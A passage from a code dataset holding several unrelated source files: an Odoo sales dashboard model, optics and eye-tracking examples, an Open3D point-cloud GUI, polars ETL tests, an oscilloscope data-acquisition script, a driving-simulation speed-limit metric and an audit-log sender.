vals.get(\n 'label_name') and 'query' in vals and vals.get('query'):\n data = self.env[\"sales.dashboard.query\"].search(\n [('model_name', '=', vals.get('model_name')), ('label_name', '=', vals.get('label_name')),\n ('query', '=', vals.get('query'))])\n if data:\n raise ValidationError(\"Record Already Exist....\")\n\n res = super(SalesDashboardQuery, self).create(vals)\n\n user_dict = []\n names = []\n dynamic_db = self.env['sales.dashboard']\n objs = self.env[\"sales.dashboard\"].search([('id', '>', 0)], order='id desc')\n for unique in objs:\n\n if {'user_id': unique.user_id.id, 'company_id': unique.company_id.id} not in user_dict:\n user_dict.append({'user_id': unique.user_id.id, 'company_id': unique.company_id.id})\n\n if unique.name not in names:\n names.append(unique.name)\n if res.model_name not in names:\n for dict in user_dict:\n dynamic_db.create({'name': res.model_name,\n 'user_id': dict['user_id'],\n 'company_id': dict['company_id']})\n return res\n\n\nclass SalesDashboardUser(models.Model):\n _name = \"res.users\"\n _inherit = \"res.users\"\n\n @api.model\n def create(self, values):\n model_names = []\n # print(\"new user\")\n res = super(SalesDashboardUser, self).create(values)\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for company in res.company_ids:\n for name in model_names:\n self.env['sales.dashboard'].sudo().create({\"name\": name, \"user_id\": res.id,\n \"company_id\": company.id})\n return res\n\n @api.multi\n def write(self, values):\n model_names = []\n if \"company_ids\" in values:\n if values.get(\"company_ids\")[0][2]:\n for company_id in values.get(\"company_ids\")[0][2]:\n dashboard = self.env['sales.dashboard'].search([(\"user_id\",\"=\", self.id), (\"company_id\",\"=\", company_id)])\n if len(dashboard) == 0:\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for name in model_names:\n self.env['sales.dashboard'].sudo().create({\"name\": name, \"user_id\": self.id,\n \"company_id\": company_id})\n\n res = super(SalesDashboardUser, self).write(values)\n return res\n\n","repo_name":"sharmatriloknath/Dashboards","sub_path":"sales_dashboard/models/sales_dashboard.py","file_name":"sales_dashboard.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39437090580","text":"#!/usr/bin/python\n\"\"\"\nA simple example\n\"\"\"\nfrom raypier.sources import ParallelRaySource\nfrom raypier.tracer import RayTraceModel\nfrom raypier.troughs import TroughParabloid\nimport numpy\n\n#\nsource = ParallelRaySource(origin=(0,20,0),\n direction=(0,-1,1),\n working_dist = 10.,\n #number=20,\n radius=1.)\n\n#print source.InputDetailRays.origin.shape\n \nm1 = TroughParabloid(width = 20,\n length = 100,\n EFL = 5,\n centre = (0,0,0))\n \nprint(m1.intersect)\n \nmodel = RayTraceModel(optics=[m1,],\n sources=[source,],\n probes=[],\n recursion_limit=2)\n \n#model.trace_detail_async()\n#import time\n#start = time.clock()\n#model.trace_all()\n#end = time.clock()\n#print \"traced in\", end - start 
\n\nmodel.configure_traits()\n","repo_name":"bryancole/raypier_optics","sub_path":"examples/troughtest.py","file_name":"troughtest.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"50"} +{"seq_id":"71633591835","text":"import cv2\nimport numpy as np\nimport math\nfrom usb import mouse\nfrom camera import camera\nfrom ml import gaze_estimation, eye_status\nfrom tools import speed_test, input_check, utils\nfrom config import *\n\nSCREEN_WIDTH_INCHES = 23.375\nSCREEN_HEIGHT_INCHES = 13.25\nINVERSE_SCREEN_WIDTH_INCHES = 0.04278\nINVERSE_SCREEN_HEIGHT_INCHES = 0.07547\nDISTANCE_TO_SCREEN_INCHES = 30\nPI_OVER_180 = 0.01745\n\ndef main():\n cam = camera.Camera()\n\n gaze_model = gaze_estimation.GazeEstimator(config[\"models_path\"] + config[\"gaze_estimation_models\"])\n eye_model = eye_status.EyeStatusEstimator(config[\"models_path\"] + config[\"eye_status_models\"])\n\n speed_tester = speed_test.SpeedTest()\n\n while(True):\n frame = cam.get_frame()\n frame = prepare_frame(frame)\n\n eye_status_result = eye_model.run(frame)\n\n if eye_status_result[0] == 1 and eye_status_result[1] == 1:\n gaze_estimation_result = gaze_model.run(frame)\n # print(\"x=%6.2f\" %gaze_estimation_result[0], \"y=%6.2f\" %gaze_estimation_result[1])\n\n x, y = get_pos(gaze_estimation_result)\n print(\"x=%6.2f\" %x, \"y=%6.2f\" %y)\n # mouse.move(x, y)\n else:\n # print(\"eye/s closed\")\n pass\n\n speed_tester.loop()\n\n if input_check.check(\"q\"):\n break\n\n cam.release()\n\n\ndef cleanup():\n input_check.exit()\n\n\ndef prepare_frame(img):\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n img = img[41:56, 16:-16]\n left = img[:, :30]\n right = img[:, -30:]\n eyes = np.concatenate((left, right), axis=1)\n\n eyes = eyes / 255.0\n\n return eyes\n\n\ndef get_pos(angles):\n np.array(angles)\n angles = angles * PI_OVER_180\n\n from_middle_x = DISTANCE_TO_SCREEN_INCHES * utils.fast_tan(angles[0])\n from_middle_y = DISTANCE_TO_SCREEN_INCHES * utils.fast_tan(angles[1])\n\n x = from_middle_x * INVERSE_SCREEN_WIDTH_INCHES + .5\n y = from_middle_y * INVERSE_SCREEN_HEIGHT_INCHES + .5\n\n x = np.clip(x, 0, 1)\n y = np.clip(y, 0, 1)\n\n return x, y\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n cleanup()","repo_name":"WillMeagher/eye_tracking_device","sub_path":"run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27625195672","text":"import os.path\nimport sys\nimport numpy as np\nimport open3d as o3d\nimport open3d.visualization.gui as gui\nimport open3d.visualization.rendering as rendering\n\nimport time\nimport rospy\nfrom sensor_msgs.msg import PointCloud2\nimport sensor_msgs.point_cloud2 as pc2\nimport pcl #sudo apt install python3-pcl\nimport ros_numpy #sudo apt-get install ros-noetic-ros-numpy\n\nimport pyransac3d as pyrsc #pip3 install pyransac3d\nimport flattten_pcd as fp\n\nprint(\"Project\")\nprint(\"python version\", sys.version)\nprint(\"open3d version\", o3d.__version__)\n\nclass WindowApp:\n \n def __init__(self):\n\n rospy.init_node(\"move_group_python_interface_tutorial\", anonymous=True)\n rospy.Subscriber('/cloud2', PointCloud2, self.callback)\n self.point_cloud = o3d.geometry.PointCloud()\n\n self.window = gui.Application.instance.create_window(\"xARM6\", 1400, 900)\n w = self.window\n\n # member variables\n self.model_dir = \"\"\n self.model_name = \"\"\n\n em = 
w.theme.font_size\n # 3D Widget\n self._widget3d = gui.SceneWidget()\n self._widget3d.scene = rendering.Open3DScene(w.renderer)\n self._widget3d.set_view_controls(gui.SceneWidget.Controls.ROTATE_CAMERA)\n # create a frame that encapsulates the Scenewidget\n self._widget3d.frame = gui.Rect(500, w.content_rect.y,\n 900, w.content_rect.height)\n #mesh = o3d.geometry.TriangleMesh.create_sphere()\n #mesh.compute_vertex_normals()\n self.material = rendering.MaterialRecord()\n self.material.shader = \"defaultLit\"\n #_widget3d.scene.add_geometry('mesh', mesh, material)\n self._widget3d.scene.set_background([200, 0, 0, 200]) # not working?!\n self._widget3d.scene.camera.look_at([0, 0, 0], [1, 1, 1], [0, 0, 1])\n self._widget3d.set_on_mouse(self._on_mouse_widget3d)\n\n # gui layout\n gui_layout = gui.Vert(0, gui.Margins(0.5 * em, 0.5 * em, 0.5 * em, 0.5 * em))\n # create frame that encapsulates the gui\n gui_layout.frame = gui.Rect(w.content_rect.x, w.content_rect.y,\n 500, w.content_rect.height)\n # File-chooser widget\n self._fileedit = gui.TextEdit()\n filedlgbutton = gui.Button(\"scan\")\n filedlgbutton.horizontal_padding_em = 0.5\n filedlgbutton.vertical_padding_em = 0\n filedlgbutton.set_on_clicked(self._on_filedlg_button)\n\n\n scanbutton = gui.Button(\"scan\")\n scanbutton.horizontal_padding_em = 1\n scanbutton.vertical_padding_em = 1\n scanbutton.set_on_clicked(self._on_scan_button)\n\n fileedit_layout = gui.Horiz()\n fileedit_layout.add_child(gui.Label(\"Model file\"))\n fileedit_layout.add_child(self._fileedit)\n fileedit_layout.add_fixed(0.25 * em)\n fileedit_layout.add_child(filedlgbutton)\n # add to the top-level (vertical) layout\n gui_layout.add_child(fileedit_layout)\n\n w.add_child(gui_layout)\n w.add_child(self._widget3d)\n\n def _on_mouse_widget3d(self, event):\n #print(event.type)\n return gui.Widget.EventCallbackResult.IGNORED\n\n def _on_filedlg_button(self):\n # filedlg = gui.FileDialog(gui.FileDialog.OPEN, \"Select file\", self.window.theme)\n # filedlg.add_filter(\".obj .ply .stl\", \"Triangle mesh (.obj, .ply, .stl)\")\n # filedlg.add_filter(\"\", \"All files\")\n # filedlg.set_on_cancel(self._on_filedlg_cancel)\n # filedlg.set_on_done(self._on_filedlg_done)\n # self.window.show_dialog(filedlg)\n if self._widget3d.scene.has_geometry('cloud2') :\n self._widget3d.scene.remove_geometry('cloud2')\n self._widget3d.scene.add_geometry('cloud2', self.point_cloud, self.material)\n\n #o3d.io.write_point_cloud(\"point_pipe.pcd\", self.point_cloud)\n pcd2 = fp.get_flattened_pcds2(source=self.point_cloud,A=0,B=1,C=0,D=0,x0=0,y0=1000,z0=0)\n center, normal, radius, inliers = fp.get_cylinder(pcd2, thresh=0.1, maxIteration=1)\n mesh_cylinder = fp.get_clylinder_mesh(pcd2,center, normal, radius, inliers)\n if self._widget3d.scene.has_geometry('cylinder') :\n self._widget3d.scene.remove_geometry('cylinder')\n self._widget3d.scene.add_geometry('cylinder', mesh_cylinder, self.material)\n print(\"center: \" + str(center))\n print(\"radius: \" + str(radius))\n print(\"vecC: \" + str(normal))\n print(\"inliers: \", inliers)\n # cil = pyrsc.Cylinder()\n # points = np.asarray(self.point_cloud.points)\n \n # center, normal, radius, inliers = cil.fit(points, thresh=0.02)\n # print(\"center: \" + str(center))\n # print(\"radius: \" + str(radius))\n # print(\"vecC: \" + str(normal))\n # R = pyrsc.get_rotationMatrix_from_vectors([0, 0, 1], normal)\n\n # plane = self.point_cloud.select_by_index(inliers).paint_uniform_color([1, 0, 0])\n # not_plane = self.point_cloud.select_by_index(inliers, 
invert=True)\n # mesh = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.2)\n # cen = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=center, size=0.5)\n # mesh_rot = copy.deepcopy(mesh).rotate(R, center=[0, 0, 0])\n\n # mesh_cylinder = o3d.geometry.TriangleMesh.create_cylinder(radius=radius, height=0.5)\n # mesh_cylinder.compute_vertex_normals()\n # mesh_cylinder.paint_uniform_color([0.1, 0.9, 0.1])\n # mesh_cylinder = mesh_cylinder.rotate(R, center=[0, 0, 0])\n # mesh_cylinder = mesh_cylinder.translate((center[0], center[1], center[2]))\n \n # self._widget3d.scene.add_geometry('mesh', mesh_cylinder, self.material)\n\n def _on_filedlg_cancel(self):\n self.window.close_dialog()\n\n def _on_filedlg_done(self, path):\n self._fileedit.text_value = path\n self.model_dir = os.path.normpath(path)\n # load model\n self.window.close_dialog()\n \n def _on_scan_button(self):\n self._widget3d.scene.add_geometry('cloud2', self.point_cloud, self.material)\n \n def callback(self, ros_cloud):\n self.point_cloud.points = o3d.utility.Vector3dVector(ros_numpy.point_cloud2\n .pointcloud2_to_xyz_array(ros_cloud))\n\n\ndef main():\n \n gui.Application.instance.initialize()\n w = WindowApp()\n gui.Application.instance.run()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shinjinok/xarm_pipe","sub_path":"example/open3dGuiExemple2.py","file_name":"open3dGuiExemple2.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73841825434","text":"# pyright: strict\n\nimport polars as pl\nfrom hypothesis import given, settings\nfrom hypothesis import strategies as st\nfrom polars.testing import assert_frame_equal\n\nfrom itunes_etl import fetch_metadata, lookup_itunes_id, wikidata_itunes_all_ids\n\n\ndef setup_module() -> None:\n pl.enable_string_cache()\n\n\ndef teardown_module() -> None:\n pl.disable_string_cache()\n\n\n_RESULT_DTYPE = pl.Struct(\n [\n pl.Field(\"id\", pl.UInt64),\n pl.Field(\"type\", pl.Utf8),\n pl.Field(\"name\", pl.Utf8),\n pl.Field(\"url\", pl.Utf8),\n pl.Field(\"kind\", pl.Utf8),\n ]\n)\n\n\n@given(\n batch_size=st.integers(min_value=1, max_value=11),\n)\n@settings(deadline=None)\ndef test_lookup_itunes_id(batch_size: int) -> None:\n lf1 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n None,\n 6446905902,\n ]\n },\n schema={\"id\": pl.UInt64},\n ).with_columns(\n pl.col(\"id\")\n .pipe(lookup_itunes_id, country=\"us\", batch_size=batch_size)\n .alias(\"result\"),\n )\n lf2 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n None,\n 6446905902,\n ],\n \"result\": [\n {\n \"id\": 909253,\n \"type\": \"Artist\",\n \"name\": \"Jack Johnson\",\n \"url\": \"https://music.apple.com/\"\n \"us/artist/jack-johnson/909253?uo=4\",\n },\n None,\n {\n \"id\": 1440768692,\n \"type\": \"Album\",\n \"name\": \"In Between Dreams\",\n \"url\": \"https://music.apple.com/\"\n \"us/album/in-between-dreams/1440768692?uo=4\",\n },\n {\n \"id\": 1440768764,\n \"kind\": \"song\",\n \"name\": \"Banana Pancakes\",\n \"url\": \"https://music.apple.com/\"\n \"us/album/banana-pancakes/1440768692?i=1440768764&uo=4\",\n },\n {\n \"id\": 909253,\n \"type\": \"Artist\",\n \"name\": \"Jack Johnson\",\n \"url\": \"https://music.apple.com/\"\n \"us/artist/jack-johnson/909253?uo=4\",\n },\n {\n \"id\": 102225079,\n 
\"type\": \"TV Show\",\n \"name\": \"The Office\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/tv-show/the-office/id102225079?uo=4\",\n },\n {\n \"id\": 1438674900,\n \"type\": \"TV Season\",\n \"name\": \"The Office: The Complete Series\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/tv-season/the-office-the-complete-series/id1438674900?uo=4\",\n },\n {\n \"id\": 284910350,\n \"kind\": \"software\",\n \"name\": \"Yelp: Food, Delivery & Reviews\",\n \"url\": \"https://apps.apple.com/\"\n \"us/app/yelp-food-delivery-reviews/id284910350?uo=4\",\n },\n {\n \"id\": 1676858107,\n \"kind\": \"feature-movie\",\n \"name\": \"Avatar: The Way of Water\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/movie/avatar-the-way-of-water/id1676858107?uo=4\",\n },\n None,\n {\n \"id\": 6446905902,\n \"kind\": \"ebook\",\n \"name\": \"Make Something Wonderful\",\n \"url\": \"https://books.apple.com/\"\n \"us/book/make-something-wonderful/id6446905902?uo=4\",\n },\n ],\n },\n schema={\"id\": pl.UInt64, \"result\": _RESULT_DTYPE},\n )\n assert lf1.schema[\"result\"] == _RESULT_DTYPE\n assert_frame_equal(lf1, lf2)\n\n\ndef test_lookup_itunes_id_empty() -> None:\n df1 = pl.DataFrame({\"id\": []}, schema={\"id\": pl.UInt64}).with_columns(\n pl.col(\"id\").pipe(lookup_itunes_id, country=\"us\").alias(\"result\")\n )\n df2 = pl.DataFrame({\"id\": [], \"result\": []}, schema=df1.schema)\n assert_frame_equal(df1, df2)\n\n\ndef test_fetch_metadata() -> None:\n lf1 = (\n pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n 6446905902,\n ]\n },\n schema={\"id\": pl.UInt64},\n )\n .pipe(fetch_metadata)\n .select(\"id\", \"type\", \"kind\", \"url\", \"us_country\", \"ca_country\", \"any_country\")\n )\n lf2 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n 6446905902,\n ],\n \"type\": [\n \"Artist\",\n None,\n \"Album\",\n None,\n \"Artist\",\n \"TV Show\",\n \"TV Season\",\n None,\n None,\n None,\n ],\n \"kind\": [\n None,\n None,\n None,\n \"song\",\n None,\n None,\n None,\n \"software\",\n \"feature-movie\",\n \"ebook\",\n ],\n \"url\": [\n \"https://music.apple.com/us/artist/jack-johnson/909253?uo=4\",\n None,\n \"https://music.apple.com/us/album/in-between-dreams/1440768692?uo=4\",\n \"https://music.apple.com/\"\n \"us/album/banana-pancakes/1440768692?i=1440768764&uo=4\",\n \"https://music.apple.com/us/artist/jack-johnson/909253?uo=4\",\n \"https://itunes.apple.com/us/tv-show/the-office/id102225079?uo=4\",\n \"https://itunes.apple.com/\"\n \"us/tv-season/the-office-the-complete-series/id1438674900?uo=4\",\n \"https://apps.apple.com/\"\n \"us/app/yelp-food-delivery-reviews/id284910350?uo=4\",\n \"https://itunes.apple.com/\"\n \"us/movie/avatar-the-way-of-water/id1676858107?uo=4\",\n \"https://books.apple.com/\"\n \"us/book/make-something-wonderful/id6446905902?uo=4\",\n ],\n \"us_country\": [True, False, True, True, True, True, True, True, True, True],\n \"ca_country\": [\n True,\n False,\n True,\n True,\n True,\n True,\n False,\n True,\n True,\n True,\n ],\n \"any_country\": [\n True,\n False,\n True,\n True,\n True,\n True,\n True,\n True,\n True,\n True,\n ],\n },\n schema={\n \"id\": pl.UInt64,\n \"type\": pl.Categorical,\n \"kind\": pl.Categorical,\n \"url\": pl.Utf8,\n \"us_country\": pl.Boolean,\n \"ca_country\": pl.Boolean,\n \"any_country\": pl.Boolean,\n },\n )\n assert_frame_equal(lf1, lf2)\n\n\ndef 
test_wikidata_itunes_all_ids() -> None:\n ldf = wikidata_itunes_all_ids()\n assert ldf.schema == {\"id\": pl.UInt64}\n ldf.collect()\n","repo_name":"josh/wikidatabots","sub_path":"test_itunes_etl.py","file_name":"test_itunes_etl.py","file_ext":"py","file_size_in_byte":8307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18604283283","text":"import sys, os\nsys.path.append(os.path.pardir)\nfrom six.moves import input\n\nfrom vxi11.tools import TDS5000B\n\ndef haltif(cond, msg=None):\n if cond:\n if msg is None:\n msg = 'Press enter to continue'\n input(msg)\n return cond\n\ndef main():\n\n NUM_AVERAGES = 10\n NUM_DATA_POINTS = 51\n\n # a Windows XP path used on the scope (which runs Windows)\n FDIR = 'w:\\\\rubidium\\\\data\\\\2008\\\\Jul\\\\23\\\\test'\n channels = ['CH3'] # array of channels to save data from\n\n scope = TDS5000B(host='rbscope')\n scope.read_timeout = 10000 # in ms\n\n pre_cmds = dict()\n post_cmds = dict()\n# pre_cmds[0] = 'CH3:SCALE .5' # before 0th iteration, execute this\n# pre_cmds[8] = 'CH3:SCALE .2' # before 8th iteration, execute this\n# pre_cmds[16] = 'CH3:SCALE .1' # before 16th iteration, execute this\n# post_cmds[16] = ('CH3:SCALE .1', 'CH4:SCALE .2') # multiple commands tuple\n# post_cmds[16] = ['CH3:SCALE .1', 'CH4:SCALE .2'] # multiple commands list\n\n\n #* ********** BEGIN EXPERIMENT PROGRAM ********* */\n scope.getStatusByte() # clear status byte.\n scope.send([\n 'SAVE:WAVEFORM:FILEFORMAT SPREADSHEETTXT', # set waveform save format\n 'ACQUIRE:STATE STOP', # stop whatever\n 'ACQUIRE:STOPAFTER SEQUENCE', # set to single shot.\n 'DATA:START 1', # start trace at beginning\n 'DATA:STOP 10000000', # make sure that we get the entire trace.\n 'FILESYSTEM:CWD \\\"' + FDIR + '\\\"' # set working dir\n ])\n\n\n msg = [\"Going to save: \"]\n for chi in channels:\n msg.append('%s ' %chi)\n msg.append('\\nto files in \\'%s\\'' %FDIR)\n print(''.join(msg))\n input('Press enter to continue!')\n\n print('Ready to accumulate', str(NUM_AVERAGES),\n 'averages of', str(NUM_DATA_POINTS), 'data scans')\n\n\n if scope.printErrors('Setup Error -- CHECK AFS TOKENS'):\n return\n\n for n in range(0,NUM_AVERAGES):\n iter = -1\n while iter < NUM_DATA_POINTS:\n iter += 1\n # set pre acquire commands.\n if iter in pre_cmds:\n scope.send(pre_cmds[iter])\n\n if haltif(scope.printErrors('pre_cmd'),'Press enter to redo last!'):\n iter -= 1\n continue\n\n # Acquire\n scope.send('ACQUIRE:STATE RUN')\n scope.waitforACQStop()\n if haltif(scope.printErrors('ACQUIRE'),'Press enter to redo last!'):\n iter -= 1\n continue\n \n\n # set POST acquire commands.\n if iter in post_cmds:\n scope.send(post_cmds[iter])\n\n if haltif(scope.printErrors('post_cmd'),'Press enter to redo last!'):\n iter -= 1\n continue\n\n print('Average/Iteration # %(n)d/%(i)d' %{'n':n, 'i':iter})\n\n\n\n # now save all the needed waveforms\n OutDir = '%(d)s\\\\%(i).4d' %{'d':FDIR, 'i':iter} \n MkOutDir = 'FILESYSTEM:MKDIR \\\"%(od)s\\\"' %{'od':OutDir} \n save_cmds = []\n for chi in channels:\n save_cmds.append(\n 'SAVE:WAVEFORM %(c)s,\\\"%(d)s\\\\scope-%(c)s-%(n).4d.txt\\\"' \\\n %{'c':chi, 'd':OutDir, 'n':n}\n )\n\n if save_cmds != []:\n scope.send(MkOutDir)\n scope.clearStatusByte() # clear+ignore status byte\n scope.send(save_cmds); # save\n\n if haltif(scope.printErrors('SAVE:WAVEFORM -- CHECK AFS TOKENS'),\n 'Press enter to redo last!'):\n iter -= 1\n continue\n\n\n\n\nif __name__ == \"__main__\":\n 
main()\n\n","repo_name":"olsonse/python-vxi11","sub_path":"examples/gather_traces.py","file_name":"gather_traces.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"24242523364","text":"import statistics\nfrom dataclasses import dataclass\nfrom typing import List, Optional\n\nfrom nuplan.common.actor_state.ego_state import EgoState\nfrom nuplan.common.maps.abstract_map_objects import GraphEdgeMapObject\nfrom nuplan.common.maps.maps_datatypes import SemanticMapLayer\nfrom nuplan.planning.metrics.abstract_metric import AbstractMetricBuilder\nfrom nuplan.planning.metrics.metric_result import MetricStatistics, MetricViolation\nfrom nuplan.planning.metrics.utils.metric_violation_aggregator import aggregate_metric_violations\nfrom nuplan.planning.simulation.history.simulation_history import SimulationHistory\n\n\n@dataclass\nclass GenericViolation:\n    \"\"\" Class used to keep track of violations, contains the depth of violation as well as their timestamp.\"\"\"\n    timestamp: int\n    violation_depths: List[float]\n\n\n@dataclass\nclass RoadElementAndSpeedLimit:\n    road_element: GraphEdgeMapObject\n    speed_limit_mps: float\n\n\nclass SpeedLimitViolationExtractor:\n    def __init__(self, history: SimulationHistory, metric_name: str, category: str, statistics_name: str) -> None:\n        self.history = history\n        self.open_violation: Optional[GenericViolation] = None\n        self.violations: List[MetricViolation] = []\n        self.last_element_and_speed_limit: Optional[RoadElementAndSpeedLimit] = None\n\n        self.metric_name = metric_name\n        self.category = category\n        self.statistics_name = statistics_name\n\n    def extract_metric(self) -> None:\n        \"\"\" Extracts the speed limit violations from the history of Ego poses.
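\n        A violation window opens when ego first exceeds the posted limit and is\n        closed, and recorded as a MetricViolation, once ego drops back below it.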
\"\"\"\n for sample in self.history.data:\n ego_state = sample.ego_state\n timestamp = sample.iteration.time_us\n\n violation = self._get_speed_limit_violation(ego_state, sample.iteration.time_us)\n if violation:\n if not self.open_violation:\n self.start_violation(violation)\n else:\n self.update_violation(violation)\n elif not violation and self.open_violation:\n self.end_violation(timestamp, higher_is_worse=True)\n # End all violations\n if self.open_violation:\n self.end_violation(self.history.data[-1].iteration.time_us)\n\n def start_violation(self, violation: GenericViolation) -> None:\n \"\"\"\n Opens the violation window of the given IDs, as they now starting to violate the metric\n\n :param violation: The current violation\n \"\"\"\n self.open_violation = violation\n\n def update_violation(self, violation: GenericViolation) -> None:\n \"\"\"\n Updates the violation if the maximum depth of violation is greater than the current maximum\n\n :param violation: The current violation\n \"\"\"\n assert isinstance(self.open_violation, GenericViolation), \"There is no open violation, cannot update it!\"\n self.open_violation.violation_depths.extend(violation.violation_depths)\n\n def end_violation(self, timestamp: int, higher_is_worse: bool = True) -> None:\n \"\"\"\n Closes the violation window, as Ego re-enters the non-violating regime\n\n :param timestamp: The current timestamp\n :param higher_is_worse: True if the violation gravity is monotonic increasing with violation depth\n\n \"\"\"\n assert isinstance(self.open_violation, GenericViolation), \"There is no open violation, cannot end it!\"\n maximal_violation = max(self.open_violation.violation_depths) if higher_is_worse else min(\n self.open_violation.violation_depths)\n\n self.violations.append(MetricViolation(name=self.statistics_name,\n metric_computator=self.metric_name,\n metric_category=self.category,\n unit=\"meters\",\n start_timestamp=self.open_violation.timestamp,\n duration=timestamp - self.open_violation.timestamp,\n extremum=maximal_violation,\n mean=statistics.mean(self.open_violation.violation_depths)))\n self.open_violation = None\n\n def _get_speed_limit_no_prior(self, ego_state: EgoState) -> Optional[RoadElementAndSpeedLimit]:\n \"\"\"\n Gets the current lane or lane connector, along with its speed limit.\n :param ego_state: State of ego\n :returns: An object with the current map element and speed limit, None if none is found\n \"\"\"\n\n if self.history.map_api.is_in_layer(ego_state.center, SemanticMapLayer.LANE):\n layer = SemanticMapLayer.LANE\n elif self.history.map_api.is_in_layer(ego_state.center, SemanticMapLayer.INTERSECTION):\n layer = SemanticMapLayer.LANE_CONNECTOR\n else:\n return None\n\n segments: List[GraphEdgeMapObject] = self.history.map_api.get_all_map_objects(ego_state.center, layer)\n segment = segments[0]\n return RoadElementAndSpeedLimit(segment, segment.speed_limit_mps)\n\n def _get_speed_limit_with_prior(self, ego_state: EgoState) -> Optional[RoadElementAndSpeedLimit]:\n \"\"\"\n Gets the current lane or lane connector, along with its speed limit, using an initial guess of where ego is.\n :param ego_state: State of ego\n :returns: An object with the current map element and speed limit, None if none is found\n \"\"\"\n assert isinstance(self.last_element_and_speed_limit, RoadElementAndSpeedLimit)\n\n # If we are in the same lane or lane connector, nothing to do\n if self.last_element_and_speed_limit.road_element.contains_point(ego_state.center):\n return self.last_element_and_speed_limit\n\n # 
We check if the upcoming map elements contain the point\n        segments = self.last_element_and_speed_limit.road_element.outgoing_edges()\n        for segment in segments:\n            if segment.contains_point(ego_state.center):\n                return RoadElementAndSpeedLimit(segment, segment.speed_limit_mps)\n\n        # If everything else fails we resort to compute from scratch\n        return self._get_speed_limit_no_prior(ego_state)\n\n    def _get_speed_limit_violation(self, ego_state: EgoState, timestamp: int) -> Optional[GenericViolation]:\n        \"\"\"\n        Computes by how much ego is exceeding the speed limit\n\n        :param ego_state: The current state of Ego\n        :param timestamp: The current timestamp\n        :return: By how much ego is exceeding the speed limit, None if no violation is present or unable to find\n            the speed limit.\n        \"\"\"\n\n        if self.last_element_and_speed_limit:\n            self.last_element_and_speed_limit = self._get_speed_limit_with_prior(ego_state)\n        else:\n            self.last_element_and_speed_limit = self._get_speed_limit_no_prior(ego_state)\n\n        if self.last_element_and_speed_limit is not None:\n            exceeding_speed = ego_state.dynamic_car_state.speed - self.last_element_and_speed_limit.speed_limit_mps\n            return GenericViolation(timestamp, violation_depths=[exceeding_speed]) if exceeding_speed > 0 else None\n\n        return None\n\n\nclass SpeedLimitViolationStatistics(AbstractMetricBuilder):\n\n    def __init__(self, name: str, category: str) -> None:\n        \"\"\"\n        Statistics on speed limit violations of ego.\n\n        :param name: Metric name.\n        :param category: Metric category.\n        \"\"\"\n\n        self._name = name\n        self._category = category\n        self._statistics_name = \"speed_limit_violation_statistics\"\n\n    @property\n    def name(self) -> str:\n        \"\"\"\n        Returns the metric name.\n        :return: the metric name.\n        \"\"\"\n\n        return self._name\n\n    @property\n    def category(self) -> str:\n        \"\"\"\n        Returns the metric category.\n        :return: the metric category.\n        \"\"\"\n\n        return self._category\n\n    def compute(self, history: SimulationHistory) -> List[MetricStatistics]:\n        \"\"\"\n        Returns the estimated metric.\n        :param history: History from a simulation engine.\n        :return: the estimated metric.\n        \"\"\"\n\n        extractor = SpeedLimitViolationExtractor(history=history, metric_name=self._name, category=self._category,\n                                                 statistics_name=self._statistics_name)\n\n        extractor.extract_metric()\n\n        violation_statistics = aggregate_metric_violations(extractor.violations, self._name, self._category,\n                                                           self._statistics_name)\n\n        return [violation_statistics]
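\n\n# Editor's sketch (hypothetical wiring, not part of the original module): the\n# builder takes a name and category, then is evaluated on a simulation history:\n#   metric = SpeedLimitViolationStatistics(name='speed_limit_violation', category='violations')\n#   results = metric.compute(history)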
config(\"PERSEPHONE_COMPLEMENTARY_DATA_SCHEMA\")\n (\n success,\n status_sent_to_persephone,\n ) = await cls.audit_client.send_to_persephone(\n topic=topic,\n partition=partition,\n message=message,\n schema_name=schema_name,\n )\n if not success:\n Gladsheim.error(\n message=\"Audit::register_user_log::Error on trying to register log\"\n )\n raise ErrorOnSendAuditLog\n return True\n","repo_name":"sam-ve-m/onboarding.complementary_data","sub_path":"func/src/transports/audit/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1650197939","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef area_of_circle (x):\n pi = 3.14\n return pi * x ** 2\n\ndef sum (start, end, func):\n total = 0\n for x in range(start, end):\n total += func(x)\n return total\ndef func1(n):\n return n\n\ndef func2(n):\n return n ** 2 + 